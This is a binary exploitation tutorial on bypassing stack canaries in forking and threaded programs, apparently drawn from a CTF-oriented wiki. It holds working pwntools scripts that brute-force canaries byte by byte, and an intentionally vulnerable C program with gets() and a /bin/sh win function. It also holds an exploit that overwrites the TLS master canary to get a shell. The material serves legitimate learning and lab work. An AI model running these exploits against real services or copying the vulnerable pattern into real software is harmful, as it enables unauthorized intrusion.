BF Forked & Threaded Stack Canaries
If you are facing a binary protected by a canary and PIE (Position Independent Executable) you probably need to find a way to bypass them.
[!NOTE] Note that checksec might not detect that a binary is protected by a canary if it was statically compiled and checksec cannot identify the relevant function. However, you can spot this manually if a value is saved on the stack at the beginning of a function and checked before the function returns.
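One rough way to look for that pattern without checksec is to search the raw bytes of the binary for the instruction that loads the canary. The sketch below is only a heuristic and rests on assumptions: it targets x86-64 Linux binaries, it only matches the `mov rax, QWORD PTR fs:0x28` encoding (compilers may use another register, and 32-bit binaries read from `gs:0x14` instead), and the helper name `count_canary_loads` is made up for illustration.

```python
# Heuristic only: the x86-64 encoding of `mov rax, QWORD PTR fs:0x28`,
# an instruction GCC commonly emits in a prologue to load the stack canary.
CANARY_LOAD_X64 = bytes.fromhex("64488b042528000000")

def count_canary_loads(code: bytes) -> int:
    """Count occurrences of the fs:0x28 load in a raw byte string."""
    count = 0
    pos = code.find(CANARY_LOAD_X64)
    while pos != -1:
        count += 1
        pos = code.find(CANARY_LOAD_X64, pos + 1)
    return count

# Usage (hypothetical path):
#   with open("./target_binary", "rb") as f:
#       print(count_canary_loads(f.read()))
```

A count of zero does not prove that the binary has no canary; it only means this particular encoding was not found.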
Brute force Canary
The best scenario for bypassing a simple canary is a binary that forks a child process every time you establish a new connection with it (network service). A forked child inherits the parent's canary, so every connection uses the same value.
In that case, the canary can be brute-forced byte by byte: a guessed byte is correct if the program continues its regular flow, and wrong if the program crashes. In this example the function brute-forces an 8-byte canary (x64) and distinguishes a correctly guessed byte from a bad one by checking whether the server sends a response back (in other situations a try/except could be used instead):
Example 1
This example is implemented for 64 bits but could be easily adapted to 32 bits.
from pwn import *
def connect():
    # Open a fresh connection; the forked child reuses the parent's canary
    return remote("localhost", 8788)
def get_bf(base):
    canary = b""
    while len(canary) < 8:
        # Try every possible value (0x00-0xff) for the next canary byte
        for guess in range(0x100):
            r = connect()
            r.recvuntil(b"Username: ")
            r.send(base + bytes([guess]))
            # "SOME OUTPUT" is whatever the server only prints when it did not crash
            found = b"SOME OUTPUT" in r.clean()
            r.close()
            if found:
                print("Guessed correct byte:", format(guess, "02x"))
                canary += bytes([guess])
                base += bytes([guess])
                break
        else:
            # No value worked: the offset or the success marker is probably wrong
            raise RuntimeError("No valid byte found for this position")
    print("FOUND: " + "".join("\\x{:02x}".format(c) for c in canary))
    return base
canary_offset = 1176
base = b"A" * canary_offset
print("Brute-Forcing canary")
base_canary = get_bf(base)  # Junk data + canary
CANARY = u64(base_canary[-8:])  # Extract the canary
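To see why the byte-by-byte approach is cheap, the loop can be modeled without any network. This is a minimal sketch, not part of the original exploit: `make_oracle` and `brute_force` are hypothetical names, and the oracle simply stands in for "the forked child did not crash".

```python
import os

def make_oracle(secret: bytes):
    """Mimic a forking server: True when all overwritten canary bytes match."""
    def oracle(prefix: bytes) -> bool:
        return secret.startswith(prefix)
    return oracle

def brute_force(oracle, size: int = 8):
    """Recover the canary one byte at a time, counting the attempts."""
    known, attempts = b"", 0
    while len(known) < size:
        for guess in range(0x100):
            attempts += 1
            if oracle(known + bytes([guess])):
                known += bytes([guess])
                break
        else:
            raise RuntimeError("oracle rejected all 256 values")
    return known, attempts

# glibc canaries have a null least-significant byte, which comes first in memory
secret = b"\x00" + os.urandom(7)
recovered, attempts = brute_force(make_oracle(secret))
print(recovered.hex(), attempts)
```

The worst case is 8 * 256 = 2048 connections, compared with 2^64 candidates if the whole value had to be guessed at once.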
Example 2
This is implemented for 32 bits, but it could be easily changed to 64 bits. Also note that in this example the program first expects one byte indicating the size of the input, followed by the payload.
from pwn import *
# Brute force the canary one byte at a time
def breakCanary():
    known_canary = b""
    len_bytes_to_read = 0x21
    for j in range(0, 4):
        # Try all 0x100 possible values for the current byte
        for test_canary in range(0x100):
            print(f"\rTrying canary: {known_canary} {test_canary.to_bytes(1, 'little')}", end="")
            # Send the current input size
            target.send(len_bytes_to_read.to_bytes(1, "little"))
            # Send this iteration's canary guess
            target.send(b"0"*0x20 + known_canary + test_canary.to_bytes(1, "little"))
            # Read the output and determine whether the guess was correct
            output = target.recvuntil(b"exit.")
            if b"YUM" in output:
                # Correct value: record the byte, grow the input size, and move on
                print(" - next byte is: " + hex(test_canary))
                known_canary = known_canary + test_canary.to_bytes(1, "little")
                len_bytes_to_read += 1
                break
    # Return the canary
    return known_canary
# Start the target process
target = process('./feedme')
#gdb.attach(target)
# Brute force the canary
canary = breakCanary()
log.info(f"The canary is: {canary}")
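The length-prefixed framing used in Example 2 can be isolated in a small helper, which makes it easier to see why the size byte grows by one for every recovered canary byte. This is a sketch under assumptions: `build_probe` is a hypothetical name, and `BUF_LEN = 0x20` is taken from the padding used in the example above.

```python
BUF_LEN = 0x20  # bytes between the start of the input and the canary (from Example 2)

def build_probe(known_canary: bytes, guess: int) -> bytes:
    """Return the size byte followed by padding, known canary bytes and one guess."""
    body = b"0" * BUF_LEN + known_canary + bytes([guess])
    if len(body) > 0xff:
        raise ValueError("body does not fit in a one-byte length prefix")
    return bytes([len(body)]) + body

# First probe: no canary bytes known yet, so the size byte is 0x21
first = build_probe(b"", 0x00)
# After one byte is known, the size byte becomes 0x22
second = build_probe(b"\x00", 0x41)
```

Sending exactly one byte past the known prefix matters: a longer write would corrupt canary bytes that have not been guessed yet and crash the child regardless of the guess.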
Threads
Threads of the same process will also share the same canary token, therefore it'll be possible to brute-force a canary if the binary spawns a new thread every time an attack happens.
A buffer overflow in a threaded function protected with a canary can also be used to overwrite the master canary, which is stored in the thread's TLS. The mitigation then becomes useless, because the check compares two canaries that are both attacker-controlled and therefore equal.
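The logic of the check can be modeled in a few lines. This is only an illustrative model, not how glibc is implemented: the `Thread` class and its field names are hypothetical, and the initial canary bytes are the little-endian form of the value seen in the GDB session of the example that follows.

```python
from dataclasses import dataclass

@dataclass
class Thread:
    master_canary: bytes  # copy kept in the TLS (read through fs:0x28 on x86-64)
    stack_canary: bytes   # copy stored in the vulnerable function's frame

    def check_passes(self) -> bool:
        # The function epilogue compares the frame copy against the TLS copy
        return self.stack_canary == self.master_canary

original = bytes.fromhex("0068153a65dc3f49")
t = Thread(master_canary=original, stack_canary=original)

t.stack_canary = b"B" * 8    # the overflow reaches only the frame
only_stack = t.check_passes()

t.master_canary = b"B" * 8   # the overflow also reaches the TLS
both = t.check_passes()
```

Overwriting only the frame copy fails the check, while overwriting both copies with the same bytes passes it without ever knowing the original value.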
Example
The following program is vulnerable to Buffer Overflow, but it is compiled with canary:
#include <pthread.h>
#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
// gcc thread_canary.c -no-pie -l pthread -o thread_canary
void win() {
    execve("/bin/sh", NULL, NULL);
}
void* vuln() {
    char data[0x20];
    gets(data);
}
int main() {
    pthread_t thread;
    pthread_create(&thread, NULL, vuln, NULL);
    pthread_join(thread, NULL);
    return 0;
}
Notice that vuln is called inside a thread. In GDB we can take a look at vuln, specifically at the point where the program calls gets to read input data:
gef> break gets
Breakpoint 1 at 0x4010a0
gef> run
...
gef> x/10gx $rdi
0x7ffff7d7ee20: 0x0000000000000000 0x0000000000000000
0x7ffff7d7ee30: 0x0000000000000000 0x0000000000000000
0x7ffff7d7ee40: 0x0000000000000000 0x493fdc653a156800
0x7ffff7d7ee50: 0x0000000000000000 0x00007ffff7e17ac3
0x7ffff7d7ee60: 0x0000000000000000 0x00007ffff7d7f640
The above represents the address of data, where the program will write user input. The stack canary is found at 0x7ffff7d7ee48 (0x493fdc653a156800), the saved $rbp is at 0x7ffff7d7ee50, and the return address is at 0x7ffff7d7ee58 (0x00007ffff7e17ac3):
gef> telescope $rdi 8 -n
0x7ffff7d7ee20|+0x0000|+000: 0x0000000000000000 <- $rdi
0x7ffff7d7ee28|+0x0008|+001: 0x0000000000000000
0x7ffff7d7ee30|+0x0010|+002: 0x0000000000000000
0x7ffff7d7ee38|+0x0018|+003: 0x0000000000000000
0x7ffff7d7ee40|+0x0020|+004: 0x0000000000000000
0x7ffff7d7ee48|+0x0028|+005: 0x493fdc653a156800 <- canary
0x7ffff7d7ee50|+0x0030|+006: 0x0000000000000000 <- $rbp
0x7ffff7d7ee58|+0x0038|+007: 0x00007ffff7e17ac3 <start_thread+0x2f3> -> 0xe8ff31fffffe6fe9 <- retaddr[2]
Notice that the stack addresses do not belong to the actual stack:
gef> vmmap stack
[ Legend: Code | Heap | Stack | Writable | ReadOnly | None | RWX ]
Start End Size Offset Perm Path
0x00007ffff7580000 0x00007ffff7d83000 0x0000000000803000 0x0000000000000000 rw- <tls-th1><stack-th2> <- $rbx, $rsp, $rbp, $rsi, $rdi, $r12
0x00007ffffffde000 0x00007ffffffff000 0x0000000000021000 0x0000000000000000 rw- [stack] <- $r9, $r15
The thread's stack lives in the same mapping as the Thread Local Storage (TLS) and at lower addresses than it, and the TLS is where the master canary is stored:
gef> tls
$tls = 0x7ffff7d7f640
...
---------------------------------------------------------------------------- TLS ----------------------------------------------------------------------------
0x7ffff7d7f640|+0x0000|+000: 0x00007ffff7d7f640 -> [loop detected] <- $rbx, $r12
0x7ffff7d7f648|+0x0008|+001: 0x00000000004052b0 -> 0x0000000000000001
0x7ffff7d7f650|+0x0010|+002: 0x00007ffff7d7f640 -> [loop detected]
0x7ffff7d7f658|+0x0018|+003: 0x0000000000000001
0x7ffff7d7f660|+0x0020|+004: 0x0000000000000000
0x7ffff7d7f668|+0x0028|+005: 0x493fdc653a156800 <- canary
0x7ffff7d7f670|+0x0030|+006: 0xb79b79966e9916c4 <- PTR_MANGLE cookie
0x7ffff7d7f678|+0x0038|+007: 0x0000000000000000
...
[!NOTE] Some of the above GDB commands are provided by an extension called bata24/gef, which has more features than the usual hugsy/gef.
As a result, a large enough buffer overflow can overwrite both the stack canary and the master canary in the TLS. From the addresses above, the master canary (0x7ffff7d7f668) is 0x848 bytes past the start of data (0x7ffff7d7ee20).
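The offsets can be double-checked with plain arithmetic on the addresses from the GDB session above. The absolute addresses are specific to that run and will differ elsewhere; only the differences matter. The constant names are chosen here for illustration.

```python
DATA_ADDR = 0x7ffff7d7ee20            # $rdi at the gets breakpoint (start of data)
STACK_CANARY_ADDR = 0x7ffff7d7ee48    # canary slot in vuln's frame
RET_ADDR_SLOT = 0x7ffff7d7ee58        # saved return address
TLS_BASE = 0x7ffff7d7f640             # value printed by the tls command
MASTER_CANARY_ADDR = TLS_BASE + 0x28  # canary slot inside the TLS

offsets = {
    "stack canary": STACK_CANARY_ADDR - DATA_ADDR,
    "return address": RET_ADDR_SLOT - DATA_ADDR,
    "master canary": MASTER_CANARY_ADDR - DATA_ADDR,
}
for name, off in offsets.items():
    print(f"{name}: {off:#x}")
```

These are the 0x28 and 0x848 values that appear in the exploit, with the return address sitting 0x38 bytes into the payload.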
This is a short exploit to call win:
from pwn import *
context.binary = 'thread_canary'
payload = b'A' * 0x28 # buffer overflow offset
payload += b'BBBBBBBB' # overwriting stack canary
payload += b'A' * 8 # saved $rbp
payload += p64(context.binary.sym.win) # return address
payload += b'A' * (0x848 - len(payload)) # padding up to the master canary
payload += b'BBBBBBBB' # overwriting master canary with the same value
io = context.binary.process()
io.sendline(payload)
io.interactive()
Other examples & references
- https://guyinatuxedo.github.io/07-bof_static/dcquals16_feedme/index.html
  - 32 bits, no PIE, nx, BF canary, write in some memory a ROP to call execve and jump there.
- http://7rocky.github.io/en/ctf/htb-challenges/pwn/robot-factory/#canaries-and-threads
  - 64 bits, no PIE, nx, modify thread and master canary.